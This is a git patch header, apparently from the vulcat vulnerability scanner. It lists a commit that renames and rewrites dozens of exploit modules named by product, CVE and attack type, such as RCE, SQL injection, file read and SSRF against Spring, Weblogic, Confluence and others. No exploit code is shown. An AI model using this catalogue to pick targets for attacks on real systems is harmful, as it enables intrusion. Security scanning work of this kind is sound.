From 124b7ddd7bb5ac5292ae1d87878081d53bea49ad Mon Sep 17 00:00:00 2001
From: CLincat <3132002932@qq.com>
Date: Wed, 15 Mar 2023 19:28:18 +0800
Subject: [PATCH] 20230315-v2.0.0
---
PluginManager.py | 148 ++++++
README.en-us.md | 364 +++++++--------
README.md | 351 +++++++-------
config.yaml | 29 +-
demo.py | 17 +
lib/api/dns.py | 5 +-
lib/core/client.py | 6 +-
lib/core/coreScan.py | 139 ++----
lib/initial/config.py | 21 +-
lib/initial/language.py | 46 +-
lib/initial/list.py | 376 ++++++---------
lib/initial/parse.py | 17 +-
lib/plugins/fingerprint/webapp.py | 68 ++-
lib/plugins/shell.py | 4 +
lib/tool/check.py | 30 +-
lib/tool/color.py | 22 +-
payloads/74cms/74cms-v5.0.1-sqlinject.py | 59 +++
payloads/74cms/74cms-v6.0.4-xss.py | 58 +++
payloads/AlibabaDruid/alibaba-druid-unauth.py | 71 +++
payloads/AlibabaDruid/main.py | 27 --
payloads/AlibabaDruid/unauth.py | 58 ---
.../alibaba-nacos-cve-2021-29441-unauth.py | 100 ++++
payloads/AlibabaNacos/cve_2021_29441.py | 86 ----
payloads/AlibabaNacos/main.py | 26 --
.../apache-apisix-cve-2020-13945-unauth.py | 109 +++++
payloads/ApacheAPISIX/cve_2020_13945.py | 96 ----
payloads/ApacheAPISIX/main.py | 27 --
.../apache-airflow-cve-2020-17526-unauth.py | 116 +++++
payloads/ApacheAirflow/cve_2020_17526.py | 101 ----
payloads/ApacheAirflow/main.py | 31 --
.../apache-druid-cve-2021-25646-rce.py | 109 +++++
.../apache-druid-cve-2021-36749-fileread.py | 91 ++++
payloads/ApacheDruid/cve_2021_25646.py | 94 ----
payloads/ApacheDruid/cve_2021_36749.py | 77 ---
payloads/ApacheDruid/main.py | 39 --
.../apache-flink-cve-2020-17519-fileread.py | 60 +++
payloads/ApacheFlink/cve_2020_17519.py | 56 ---
payloads/ApacheFlink/main.py | 28 --
payloads/ApacheHadoop/apache-hadoop-unauth.py | 73 +++
payloads/ApacheHadoop/main.py | 30 --
payloads/ApacheHadoop/new_unauth.py | 57 ---
payloads/ApacheHadoop/old_unauth.py | 99 ----
...py => apache-httpd-cve-2021-40438-ssrf.py} | 96 ++--
...pache-httpd-cve-2021-41773-rce-fileread.py | 114 +++++
...pache-httpd-cve-2021-42013-rce-fileread.py | 103 ++++
payloads/ApacheHttpd/cve_2021_41773.py | 98 ----
payloads/ApacheHttpd/cve_2021_42013.py | 87 ----
payloads/ApacheHttpd/main.py | 45 --
payloads/ApacheKafka/cve_2023_25194.py | 95 ----
payloads/ApacheKafka/main.py | 34 --
...ache-skywalking-cve-2020-9483-sqlinject.py | 67 +++
payloads/ApacheSkyWalking/cve_2020_9483.py | 77 ---
payloads/ApacheSkyWalking/main.py | 32 --
.../apache-solr-cve-2017-12629-rce.py | 127 +++++
.../apache-solr-cve-2019-17558-rce.py | 69 +++
...pache-solr-cve-2021-27905-ssrf-fileread.py | 76 +++
payloads/ApacheSolr/cve_2017_12629.py | 112 -----
payloads/ApacheSolr/cve_2019_17558.py | 57 ---
payloads/ApacheSolr/cve_2021_27905.py | 56 ---
payloads/ApacheSolr/main.py | 53 ---
payloads/ApacheSolr/tool_enable.py | 27 +-
...apache-tomcat-cve-2017-12615-fileupload.py | 94 ++++
payloads/ApacheTomcat/cve_2017_12615.py | 80 ----
payloads/ApacheTomcat/main.py | 28 --
.../apache-unomi-cve-2020-13942-rce.py | 106 +++++
payloads/ApacheUnomi/cve_2020_13942.py | 92 ----
payloads/ApacheUnomi/main.py | 33 --
.../AppWeb/appweb-cve-2018-8715-unauth.py | 91 ++++
payloads/AppWeb/cve_2018_8715.py | 75 ---
payloads/AppWeb/main.py | 33 --
...ence-cve-2015-8399-fileread-fileinclude.py | 78 ++++
...ssian-confluence-cve-2019-3396-fileread.py | 88 ++++
...atlassian-confluence-cve-2021-26084-rce.py | 76 +++
...atlassian-confluence-cve-2022-26134-rce.py | 80 ++++
payloads/AtlassianConfluence/cve_2015_8399.py | 63 ---
payloads/AtlassianConfluence/cve_2019_3396.py | 73 ---
.../AtlassianConfluence/cve_2021_26084.py | 61 ---
.../AtlassianConfluence/cve_2022_26134.py | 64 ---
payloads/AtlassianConfluence/main.py | 50 --
payloads/Cisco/cisco-cve-2020-3580-xss.py | 73 +++
payloads/Cisco/cve_2020_3580.py | 61 ---
payloads/Cisco/main.py | 26 --
.../Discuz/discuz-wooyun-2010-080723-rce.py | 76 +++
payloads/Discuz/main.py | 31 --
payloads/Discuz/wooyun_2010_080723.py | 61 ---
payloads/Django/cve_2017_12794.py | 65 ---
payloads/Django/cve_2018_14574.py | 44 --
payloads/Django/cve_2019_14234.py | 53 ---
payloads/Django/cve_2020_9402.py | 48 --
payloads/Django/cve_2021_35042.py | 48 --
payloads/Django/django-cve-2017-12794-xss.py | 80 ++++
.../Django/django-cve-2018-14574-redirect.py | 58 +++
.../Django/django-cve-2019-14234-sqlinject.py | 69 +++
.../Django/django-cve-2020-9402-sqlinject.py | 64 +++
.../Django/django-cve-2021-35042-sqlinject.py | 63 +++
payloads/Django/main.py | 63 ---
payloads/Django/tool_get_urlconf.py | 4 +-
payloads/Drupal/cve_2014_3704.py | 47 --
payloads/Drupal/cve_2017_6920.py | 68 ---
payloads/Drupal/cve_2018_7600.py | 52 ---
payloads/Drupal/cve_2018_7602.py | 79 ----
.../Drupal/drupal-cve-2014-3704-sqlinject.py | 61 +++
payloads/Drupal/drupal-cve-2017-6920-rce.py | 84 ++++
payloads/Drupal/drupal-cve-2018-7600-rce.py | 68 +++
payloads/Drupal/drupal-cve-2018-7602-rce.py | 96 ++++
payloads/Drupal/main.py | 56 ---
payloads/Drupal/tool_get_token.py | 2 +-
payloads/ElasticSearch/cve_2014_3120.py | 58 ---
payloads/ElasticSearch/cve_2015_1427.py | 58 ---
payloads/ElasticSearch/cve_2015_3337.py | 48 --
payloads/ElasticSearch/cve_2015_5531.py | 80 ----
.../elasticsearch-cve-2014-3120-rce.py | 73 +++
.../elasticsearch-cve-2015-1427-rce.py | 73 +++
.../elasticsearch-cve-2015-3337-fileread.py | 64 +++
.../elasticsearch-cve-2015-5531-fileread.py | 95 ++++
payloads/ElasticSearch/main.py | 50 --
payloads/F5BIGIP/cve_2020_5902.py | 52 ---
payloads/F5BIGIP/cve_2022_1388.py | 64 ---
.../f5bigip-cve-2020-5902-rce-fileread.py | 67 +++
.../f5bigip-cve-2022-1388-unauth-rce.py | 79 ++++
payloads/F5BIGIP/main.py | 36 --
payloads/Fastjson/cnvd_2017_02833.py | 53 ---
payloads/Fastjson/cnvd_2019_22238.py | 53 ---
.../Fastjson/fastjson-cnvd-2017-02833-rce.py | 68 +++
.../Fastjson/fastjson-cnvd-2019-22238-rce.py | 71 +++
payloads/Fastjson/fastjson-v1.2.62-rce.py | 73 +++
payloads/Fastjson/fastjson-v1.2.66-rce.py | 73 +++
payloads/Fastjson/main.py | 50 --
payloads/Fastjson/rce_1_2_62.py | 59 ---
payloads/Fastjson/rce_1_2_66.py | 59 ---
payloads/Gitea/gitea-unauth-fileread-rce.py | 85 ++++
payloads/Gitea/main.py | 32 --
payloads/Gitea/unauth.py | 68 ---
payloads/Gitlab/cve_2021_22205.py | 107 -----
payloads/Gitlab/cve_2021_22214.py | 67 ---
payloads/Gitlab/gitlab-cve-2021-22205-rce.py | 128 +++++
payloads/Gitlab/gitlab-cve-2021-22214-ssrf.py | 80 ++++
payloads/Gitlab/main.py | 49 --
payloads/GoCD/cve_2021_43287.py | 47 --
payloads/GoCD/gocd-cve-2021-43287-fileread.py | 64 +++
payloads/GoCD/main.py | 33 --
payloads/Grafana/cve_2021_43798.py | 69 ---
.../grafana-cve-2021-43798-fileread.py | 81 ++++
payloads/Grafana/main.py | 31 --
payloads/Influxdb/influxdb-unauth.py | 72 +++
payloads/Influxdb/main.py | 32 --
payloads/Influxdb/unauth.py | 52 ---
payloads/JBoss/jboss-unauth.py | 72 +++
payloads/JBoss/main.py | 37 --
payloads/JBoss/unauth.py | 56 ---
payloads/Jenkins/cve_2018_1000861.py | 56 ---
.../Jenkins/jenkins-cve-2018-1000861-rce.py | 69 +++
payloads/Jenkins/jenkins-unauth.py | 72 +++
payloads/Jenkins/main.py | 39 --
payloads/Jenkins/unauth.py | 58 ---
payloads/Jetty/cve_2021_28164.py | 44 --
payloads/Jetty/cve_2021_28169.py | 44 --
payloads/Jetty/cve_2021_34429.py | 47 --
payloads/Jetty/jetty-cve-2021-28164-dsinfo.py | 60 +++
payloads/Jetty/jetty-cve-2021-28169-dsinfo.py | 62 +++
payloads/Jetty/jetty-cve-2021-34429-dsinfo.py | 63 +++
payloads/Jetty/main.py | 44 --
payloads/Joomla/cve_2017_8917.py | 49 --
.../Joomla/joomla-cve-2017-8917-sqlinject.py | 71 +++
...752.py => joomla-cve-2023-23752-unauth.py} | 105 +++--
payloads/Joomla/main.py | 44 --
payloads/Jupyter/jupyter-unauth.py | 61 +++
payloads/Jupyter/main.py | 32 --
payloads/Jupyter/unauth.py | 45 --
payloads/Keycloak/cve_2020_10770.py | 49 --
.../Keycloak/keycloak-cve-2020-10770-ssrf.py | 63 +++
payloads/Keycloak/main.py | 28 --
payloads/Kindeditor/cve_2018_18950.py | 40 --
payloads/Kindeditor/main.py | 31 --
payloads/Landray/cnvd_2021_28277.py | 107 -----
...andray-oa-cnvd-2021-28277-ssrf-fileread.py | 123 +++++
payloads/Landray/main.py | 32 --
payloads/MiniHttpd/cve_2018_18778.py | 43 --
payloads/MiniHttpd/main.py | 32 --
.../minihttpd-cve-2018-18778-fileread.py | 59 +++
payloads/MongoExpress/cve_2019_10758.py | 81 ----
payloads/MongoExpress/main.py | 31 --
.../mongoexpress-cve-2019-10758-rce.py | 95 ++++
payloads/Nexus/cve_2019_15588.py | 69 ---
payloads/Nexus/cve_2019_5475.py | 71 ---
payloads/Nexus/cve_2019_7238.py | 87 ----
payloads/Nexus/cve_2020_10199.py | 99 ----
payloads/Nexus/cve_2020_10204.py | 94 ----
payloads/Nexus/main.py | 69 ---
payloads/Nexus/nexus-cve-2019-15588-rce.py | 87 ++++
payloads/Nexus/nexus-cve-2019-5475-rce.py | 89 ++++
payloads/Nexus/nexus-cve-2019-7238-rce.py | 101 ++++
payloads/Nexus/nexus-cve-2020-10199-rce.py | 114 +++++
payloads/Nexus/nexus-cve-2020-10204-rce.py | 113 +++++
payloads/Nexus/tool_get_yumid.py | 2 +-
payloads/NodeRED/cve_2021_3223.py | 51 --
payloads/NodeRED/main.py | 31 --
.../NodeRED/nodered-cve-2021-3223-fileread.py | 66 +++
payloads/Nodejs/cve_2017_14849.py | 46 --
payloads/Nodejs/cve_2021_21315.py | 53 ---
payloads/Nodejs/main.py | 37 --
.../Nodejs/nodejs-cve-2017-14849-fileread.py | 61 +++
payloads/Nodejs/nodejs-cve-2021-21315-rce.py | 66 +++
payloads/RubyOnRails/cve_2018_3760.py | 79 ----
payloads/RubyOnRails/cve_2019_5418.py | 44 --
payloads/RubyOnRails/cve_2020_8163.py | 48 --
payloads/RubyOnRails/main.py | 44 --
.../ruby-on-rails-cve-2018-3760-fileread.py | 95 ++++
.../ruby-on-rails-cve-2019-5418-fileread.py | 65 +++
.../ruby-on-rails-cve-2020-8163-rce.py | 69 +++
payloads/RubyOnRails/tool_get_route_path.py | 31 ++
payloads/ShowDoc/cnvd_2020_26585.py | 74 ---
payloads/ShowDoc/main.py | 32 --
.../showdoc-cnvd-2020-26585-fileupload.py | 94 ++++
payloads/Spring/cve_2016_4977.py | 48 --
payloads/Spring/cve_2017_8046.py | 80 ----
payloads/Spring/cve_2018_1273.py | 68 ---
payloads/Spring/cve_2020_5410.py | 42 --
payloads/Spring/cve_2021_21234.py | 44 --
payloads/Spring/cve_2022_22947.py | 91 ----
payloads/Spring/cve_2022_22963.py | 78 ----
payloads/Spring/cve_2022_22965.py | 81 ----
payloads/Spring/main.py | 72 ---
.../spring-boot-cve-2021-21234-fileread.py | 59 +++
...ing-cloud-config-cve-2020-5410-fileread.py | 57 +++
...pring-cloud-function-cve-2022-22963-rce.py | 91 ++++
...spring-cloud-gateway-cve-2022-22947-rce.py | 106 +++++
payloads/Spring/spring-cve-2022-22965-rce.py | 97 ++++
.../spring-data-commons-cve-2018-1273-rce.py | 81 ++++
.../spring-data-rest-cve-2017-8046-rce.py | 94 ++++
...spring-security-oauth-cve-2016-4977-rce.py | 63 +++
payloads/Supervisor/cve_2017_11610.py | 91 ----
payloads/Supervisor/main.py | 33 --
.../supervisor-cve-2017-11610-rce.py | 107 +++++
payloads/ThinkPHP/_2_x_rce.py | 39 --
payloads/ThinkPHP/_5_ids_sqlinject.py | 36 --
payloads/ThinkPHP/cnnvd_201901_445.py | 47 --
payloads/ThinkPHP/cnvd_2018_24942.py | 48 --
payloads/ThinkPHP/cnvd_2022_86535.py | 98 ----
payloads/ThinkPHP/cve_2018_1002015.py | 63 ---
payloads/ThinkPHP/main.py | 95 ----
payloads/ThinkPHP/main.txt | 36 ++
payloads/ThinkPHP/thinkphp-2.x-rce.py | 55 +++
payloads/ThinkPHP/thinkphp-5-ids-sqlinject.py | 53 +++
.../ThinkPHP/thinkphp-cnnvd-201901-445-rce.py | 67 +++
.../ThinkPHP/thinkphp-cnvd-2018-24942-rce.py | 64 +++
.../ThinkPHP/thinkphp-cnvd-2022-86535-rce.py | 113 +++++
.../ThinkPHP/thinkphp-cve-2018-1002015-rce.py | 78 ++++
payloads/Ueditor/main.py | 29 --
payloads/Ueditor/ssrf.py | 56 ---
payloads/Ueditor/ueditor-ssrf.py | 70 +++
payloads/VMware/test.tar | Bin 0 -> 10240 bytes
.../VMware/vmware-vcenter-2020-10-fileread.py | 72 +++
...e-vcenter-cve-2021-21972-fileupload-rce.py | 100 ++++
payloads/Weblogic/cve_2014_4210.py | 48 --
payloads/Weblogic/cve_2017_10271.py | 85 ----
payloads/Weblogic/cve_2019_2725.py | 80 ----
payloads/Weblogic/cve_2020_14750.py | 66 ---
payloads/Weblogic/cve_2020_14882.py | 58 ---
payloads/Weblogic/cve_2021_2109.py | 84 ----
payloads/Weblogic/main.py | 55 ---
.../oracle-weblogic-cve-2014-4210-ssrf.py | 61 +++
...cle-weblogic-cve-2017-10271-unserialize.py | 101 ++++
...acle-weblogic-cve-2019-2725-unserialize.py | 112 +++++
.../oracle-weblogic-cve-2020-14750-bypass.py | 83 ++++
...acle-weblogic-cve-2020-14882-rce-unauth.py | 72 +++
.../oracle-weblogic-cve-2021-2109-rce.py | 102 ++++
payloads/Webmin/cve_2019_15107.py | 55 ---
payloads/Webmin/cve_2019_15642.py | 65 ---
payloads/Webmin/main.py | 37 --
payloads/Webmin/webmin-cve-2019-15107-rce.py | 72 +++
payloads/Webmin/webmin-cve-2019-15642-rce.py | 80 ++++
payloads/Yonyou/cnnvd_201610_923.py | 52 ---
payloads/Yonyou/cnvd_2021_30167.py | 106 -----
payloads/Yonyou/main.py | 52 ---
payloads/Yonyou/nc_fileread.py | 38 --
payloads/Yonyou/u8_oa_getsession.py | 41 --
payloads/Yonyou/u8_oa_test_sqlinject.py | 38 --
.../yonyou-erp-nc-ncfindweb-fileread.py | 53 +++
...onyou-grp-u8-cnnvd-201610-923-sqlinject.py | 67 +++
.../Yonyou/yonyou-nc-cnvd-2021-30167-rce.py | 121 +++++
.../Yonyou/yonyou-u8-oa-getsession-dsinfo.py | 57 +++
.../Yonyou/yonyou-u8-oa-test.jsp-sqlinject.py | 55 +++
payloads/Zabbix/cve_2016_10134.py | 46 --
payloads/Zabbix/main.py | 33 --
.../Zabbix/zabbix-cve-2016-10134-sqlinject.py | 61 +++
payloads/demo/main.py | 43 --
payloads/demo/scan.py | 71 ---
payloads/demo/scan_2.py | 76 ---
payloads/phpMyadmin/cve_2018_12613.py | 41 --
payloads/phpMyadmin/main.py | 38 --
...min-cve-2018-12613-fileinclude-fileread.py | 57 +++
...pmyadmin-wooyun-2016-199433-unserialize.py | 80 ++++
payloads/phpMyadmin/wooyun_2016_199433.py | 64 ---
payloads/phpUint/cve_2017_9841.py | 58 ---
payloads/phpUint/main.py | 32 --
payloads/phpUint/phpunit-cve-2017-9841-rce.py | 78 ++++
payloads/uWSGIPHP/cve_2018_7490.py | 42 --
payloads/uWSGIPHP/main.py | 32 --
.../uwsgiphp-cve-2018-7490-fileread.py | 57 +++
requirements.txt | 6 +-
thirdparty/requests/__init__.py | 94 ++--
thirdparty/requests/__version__.py | 20 +-
thirdparty/requests/_internal_utils.py | 24 +-
thirdparty/requests/adapters.py | 229 +++++----
thirdparty/requests/api.py | 18 +-
thirdparty/requests/auth.py | 156 ++++---
thirdparty/requests/certs.py | 3 +-
thirdparty/requests/compat.py | 90 ++--
thirdparty/requests/cookies.py | 152 +++---
thirdparty/requests/exceptions.py | 32 +-
thirdparty/requests/help.py | 101 ++--
thirdparty/requests/hooks.py | 7 +-
thirdparty/requests/models.py | 360 ++++++++------
thirdparty/requests/packages.py | 16 +-
thirdparty/requests/sessions.py | 288 +++++++-----
thirdparty/requests/status_codes.py | 169 +++----
thirdparty/requests/structures.py | 12 +-
thirdparty/requests/utils.py | 439 ++++++++++--------
vulcat.py | 7 +-
320 files changed, 11074 insertions(+), 11145 deletions(-)
create mode 100644 PluginManager.py
create mode 100644 demo.py
create mode 100644 payloads/74cms/74cms-v5.0.1-sqlinject.py
create mode 100644 payloads/74cms/74cms-v6.0.4-xss.py
create mode 100644 payloads/AlibabaDruid/alibaba-druid-unauth.py
delete mode 100644 payloads/AlibabaDruid/main.py
delete mode 100644 payloads/AlibabaDruid/unauth.py
create mode 100644 payloads/AlibabaNacos/alibaba-nacos-cve-2021-29441-unauth.py
delete mode 100644 payloads/AlibabaNacos/cve_2021_29441.py
delete mode 100644 payloads/AlibabaNacos/main.py
create mode 100644 payloads/ApacheAPISIX/apache-apisix-cve-2020-13945-unauth.py
delete mode 100644 payloads/ApacheAPISIX/cve_2020_13945.py
delete mode 100644 payloads/ApacheAPISIX/main.py
create mode 100644 payloads/ApacheAirflow/apache-airflow-cve-2020-17526-unauth.py
delete mode 100644 payloads/ApacheAirflow/cve_2020_17526.py
delete mode 100644 payloads/ApacheAirflow/main.py
create mode 100644 payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py
create mode 100644 payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py
delete mode 100644 payloads/ApacheDruid/cve_2021_25646.py
delete mode 100644 payloads/ApacheDruid/cve_2021_36749.py
delete mode 100644 payloads/ApacheDruid/main.py
create mode 100644 payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py
delete mode 100644 payloads/ApacheFlink/cve_2020_17519.py
delete mode 100644 payloads/ApacheFlink/main.py
create mode 100644 payloads/ApacheHadoop/apache-hadoop-unauth.py
delete mode 100644 payloads/ApacheHadoop/main.py
delete mode 100644 payloads/ApacheHadoop/new_unauth.py
delete mode 100644 payloads/ApacheHadoop/old_unauth.py
rename payloads/ApacheHttpd/{cve_2021_40438.py => apache-httpd-cve-2021-40438-ssrf.py} (71%)
create mode 100644 payloads/ApacheHttpd/apache-httpd-cve-2021-41773-rce-fileread.py
create mode 100644 payloads/ApacheHttpd/apache-httpd-cve-2021-42013-rce-fileread.py
delete mode 100644 payloads/ApacheHttpd/cve_2021_41773.py
delete mode 100644 payloads/ApacheHttpd/cve_2021_42013.py
delete mode 100644 payloads/ApacheHttpd/main.py
delete mode 100644 payloads/ApacheKafka/cve_2023_25194.py
delete mode 100644 payloads/ApacheKafka/main.py
create mode 100644 payloads/ApacheSkyWalking/apache-skywalking-cve-2020-9483-sqlinject.py
delete mode 100644 payloads/ApacheSkyWalking/cve_2020_9483.py
delete mode 100644 payloads/ApacheSkyWalking/main.py
create mode 100644 payloads/ApacheSolr/apache-solr-cve-2017-12629-rce.py
create mode 100644 payloads/ApacheSolr/apache-solr-cve-2019-17558-rce.py
create mode 100644 payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py
delete mode 100644 payloads/ApacheSolr/cve_2017_12629.py
delete mode 100644 payloads/ApacheSolr/cve_2019_17558.py
delete mode 100644 payloads/ApacheSolr/cve_2021_27905.py
delete mode 100644 payloads/ApacheSolr/main.py
create mode 100644 payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py
delete mode 100644 payloads/ApacheTomcat/cve_2017_12615.py
delete mode 100644 payloads/ApacheTomcat/main.py
create mode 100644 payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py
delete mode 100644 payloads/ApacheUnomi/cve_2020_13942.py
delete mode 100644 payloads/ApacheUnomi/main.py
create mode 100644 payloads/AppWeb/appweb-cve-2018-8715-unauth.py
delete mode 100644 payloads/AppWeb/cve_2018_8715.py
delete mode 100644 payloads/AppWeb/main.py
create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2015-8399-fileread-fileinclude.py
create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2019-3396-fileread.py
create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2021-26084-rce.py
create mode 100644 payloads/AtlassianConfluence/atlassian-confluence-cve-2022-26134-rce.py
delete mode 100644 payloads/AtlassianConfluence/cve_2015_8399.py
delete mode 100644 payloads/AtlassianConfluence/cve_2019_3396.py
delete mode 100644 payloads/AtlassianConfluence/cve_2021_26084.py
delete mode 100644 payloads/AtlassianConfluence/cve_2022_26134.py
delete mode 100644 payloads/AtlassianConfluence/main.py
create mode 100644 payloads/Cisco/cisco-cve-2020-3580-xss.py
delete mode 100644 payloads/Cisco/cve_2020_3580.py
delete mode 100644 payloads/Cisco/main.py
create mode 100644 payloads/Discuz/discuz-wooyun-2010-080723-rce.py
delete mode 100644 payloads/Discuz/main.py
delete mode 100644 payloads/Discuz/wooyun_2010_080723.py
delete mode 100644 payloads/Django/cve_2017_12794.py
delete mode 100644 payloads/Django/cve_2018_14574.py
delete mode 100644 payloads/Django/cve_2019_14234.py
delete mode 100644 payloads/Django/cve_2020_9402.py
delete mode 100644 payloads/Django/cve_2021_35042.py
create mode 100644 payloads/Django/django-cve-2017-12794-xss.py
create mode 100644 payloads/Django/django-cve-2018-14574-redirect.py
create mode 100644 payloads/Django/django-cve-2019-14234-sqlinject.py
create mode 100644 payloads/Django/django-cve-2020-9402-sqlinject.py
create mode 100644 payloads/Django/django-cve-2021-35042-sqlinject.py
delete mode 100644 payloads/Django/main.py
delete mode 100644 payloads/Drupal/cve_2014_3704.py
delete mode 100644 payloads/Drupal/cve_2017_6920.py
delete mode 100644 payloads/Drupal/cve_2018_7600.py
delete mode 100644 payloads/Drupal/cve_2018_7602.py
create mode 100644 payloads/Drupal/drupal-cve-2014-3704-sqlinject.py
create mode 100644 payloads/Drupal/drupal-cve-2017-6920-rce.py
create mode 100644 payloads/Drupal/drupal-cve-2018-7600-rce.py
create mode 100644 payloads/Drupal/drupal-cve-2018-7602-rce.py
delete mode 100644 payloads/Drupal/main.py
delete mode 100644 payloads/ElasticSearch/cve_2014_3120.py
delete mode 100644 payloads/ElasticSearch/cve_2015_1427.py
delete mode 100644 payloads/ElasticSearch/cve_2015_3337.py
delete mode 100644 payloads/ElasticSearch/cve_2015_5531.py
create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2014-3120-rce.py
create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2015-1427-rce.py
create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2015-3337-fileread.py
create mode 100644 payloads/ElasticSearch/elasticsearch-cve-2015-5531-fileread.py
delete mode 100644 payloads/ElasticSearch/main.py
delete mode 100644 payloads/F5BIGIP/cve_2020_5902.py
delete mode 100644 payloads/F5BIGIP/cve_2022_1388.py
create mode 100644 payloads/F5BIGIP/f5bigip-cve-2020-5902-rce-fileread.py
create mode 100644 payloads/F5BIGIP/f5bigip-cve-2022-1388-unauth-rce.py
delete mode 100644 payloads/F5BIGIP/main.py
delete mode 100644 payloads/Fastjson/cnvd_2017_02833.py
delete mode 100644 payloads/Fastjson/cnvd_2019_22238.py
create mode 100644 payloads/Fastjson/fastjson-cnvd-2017-02833-rce.py
create mode 100644 payloads/Fastjson/fastjson-cnvd-2019-22238-rce.py
create mode 100644 payloads/Fastjson/fastjson-v1.2.62-rce.py
create mode 100644 payloads/Fastjson/fastjson-v1.2.66-rce.py
delete mode 100644 payloads/Fastjson/main.py
delete mode 100644 payloads/Fastjson/rce_1_2_62.py
delete mode 100644 payloads/Fastjson/rce_1_2_66.py
create mode 100644 payloads/Gitea/gitea-unauth-fileread-rce.py
delete mode 100644 payloads/Gitea/main.py
delete mode 100644 payloads/Gitea/unauth.py
delete mode 100644 payloads/Gitlab/cve_2021_22205.py
delete mode 100644 payloads/Gitlab/cve_2021_22214.py
create mode 100644 payloads/Gitlab/gitlab-cve-2021-22205-rce.py
create mode 100644 payloads/Gitlab/gitlab-cve-2021-22214-ssrf.py
delete mode 100644 payloads/Gitlab/main.py
delete mode 100644 payloads/GoCD/cve_2021_43287.py
create mode 100644 payloads/GoCD/gocd-cve-2021-43287-fileread.py
delete mode 100644 payloads/GoCD/main.py
delete mode 100644 payloads/Grafana/cve_2021_43798.py
create mode 100644 payloads/Grafana/grafana-cve-2021-43798-fileread.py
delete mode 100644 payloads/Grafana/main.py
create mode 100644 payloads/Influxdb/influxdb-unauth.py
delete mode 100644 payloads/Influxdb/main.py
delete mode 100644 payloads/Influxdb/unauth.py
create mode 100644 payloads/JBoss/jboss-unauth.py
delete mode 100644 payloads/JBoss/main.py
delete mode 100644 payloads/JBoss/unauth.py
delete mode 100644 payloads/Jenkins/cve_2018_1000861.py
create mode 100644 payloads/Jenkins/jenkins-cve-2018-1000861-rce.py
create mode 100644 payloads/Jenkins/jenkins-unauth.py
delete mode 100644 payloads/Jenkins/main.py
delete mode 100644 payloads/Jenkins/unauth.py
delete mode 100644 payloads/Jetty/cve_2021_28164.py
delete mode 100644 payloads/Jetty/cve_2021_28169.py
delete mode 100644 payloads/Jetty/cve_2021_34429.py
create mode 100644 payloads/Jetty/jetty-cve-2021-28164-dsinfo.py
create mode 100644 payloads/Jetty/jetty-cve-2021-28169-dsinfo.py
create mode 100644 payloads/Jetty/jetty-cve-2021-34429-dsinfo.py
delete mode 100644 payloads/Jetty/main.py
delete mode 100644 payloads/Joomla/cve_2017_8917.py
create mode 100644 payloads/Joomla/joomla-cve-2017-8917-sqlinject.py
rename payloads/Joomla/{cve_2023_23752.py => joomla-cve-2023-23752-unauth.py} (76%)
delete mode 100644 payloads/Joomla/main.py
create mode 100644 payloads/Jupyter/jupyter-unauth.py
delete mode 100644 payloads/Jupyter/main.py
delete mode 100644 payloads/Jupyter/unauth.py
delete mode 100644 payloads/Keycloak/cve_2020_10770.py
create mode 100644 payloads/Keycloak/keycloak-cve-2020-10770-ssrf.py
delete mode 100644 payloads/Keycloak/main.py
delete mode 100644 payloads/Kindeditor/cve_2018_18950.py
delete mode 100644 payloads/Kindeditor/main.py
delete mode 100644 payloads/Landray/cnvd_2021_28277.py
create mode 100644 payloads/Landray/landray-oa-cnvd-2021-28277-ssrf-fileread.py
delete mode 100644 payloads/Landray/main.py
delete mode 100644 payloads/MiniHttpd/cve_2018_18778.py
delete mode 100644 payloads/MiniHttpd/main.py
create mode 100644 payloads/MiniHttpd/minihttpd-cve-2018-18778-fileread.py
delete mode 100644 payloads/MongoExpress/cve_2019_10758.py
delete mode 100644 payloads/MongoExpress/main.py
create mode 100644 payloads/MongoExpress/mongoexpress-cve-2019-10758-rce.py
delete mode 100644 payloads/Nexus/cve_2019_15588.py
delete mode 100644 payloads/Nexus/cve_2019_5475.py
delete mode 100644 payloads/Nexus/cve_2019_7238.py
delete mode 100644 payloads/Nexus/cve_2020_10199.py
delete mode 100644 payloads/Nexus/cve_2020_10204.py
delete mode 100644 payloads/Nexus/main.py
create mode 100644 payloads/Nexus/nexus-cve-2019-15588-rce.py
create mode 100644 payloads/Nexus/nexus-cve-2019-5475-rce.py
create mode 100644 payloads/Nexus/nexus-cve-2019-7238-rce.py
create mode 100644 payloads/Nexus/nexus-cve-2020-10199-rce.py
create mode 100644 payloads/Nexus/nexus-cve-2020-10204-rce.py
delete mode 100644 payloads/NodeRED/cve_2021_3223.py
delete mode 100644 payloads/NodeRED/main.py
create mode 100644 payloads/NodeRED/nodered-cve-2021-3223-fileread.py
delete mode 100644 payloads/Nodejs/cve_2017_14849.py
delete mode 100644 payloads/Nodejs/cve_2021_21315.py
delete mode 100644 payloads/Nodejs/main.py
create mode 100644 payloads/Nodejs/nodejs-cve-2017-14849-fileread.py
create mode 100644 payloads/Nodejs/nodejs-cve-2021-21315-rce.py
delete mode 100644 payloads/RubyOnRails/cve_2018_3760.py
delete mode 100644 payloads/RubyOnRails/cve_2019_5418.py
delete mode 100644 payloads/RubyOnRails/cve_2020_8163.py
delete mode 100644 payloads/RubyOnRails/main.py
create mode 100644 payloads/RubyOnRails/ruby-on-rails-cve-2018-3760-fileread.py
create mode 100644 payloads/RubyOnRails/ruby-on-rails-cve-2019-5418-fileread.py
create mode 100644 payloads/RubyOnRails/ruby-on-rails-cve-2020-8163-rce.py
create mode 100644 payloads/RubyOnRails/tool_get_route_path.py
delete mode 100644 payloads/ShowDoc/cnvd_2020_26585.py
delete mode 100644 payloads/ShowDoc/main.py
create mode 100644 payloads/ShowDoc/showdoc-cnvd-2020-26585-fileupload.py
delete mode 100644 payloads/Spring/cve_2016_4977.py
delete mode 100644 payloads/Spring/cve_2017_8046.py
delete mode 100644 payloads/Spring/cve_2018_1273.py
delete mode 100644 payloads/Spring/cve_2020_5410.py
delete mode 100644 payloads/Spring/cve_2021_21234.py
delete mode 100644 payloads/Spring/cve_2022_22947.py
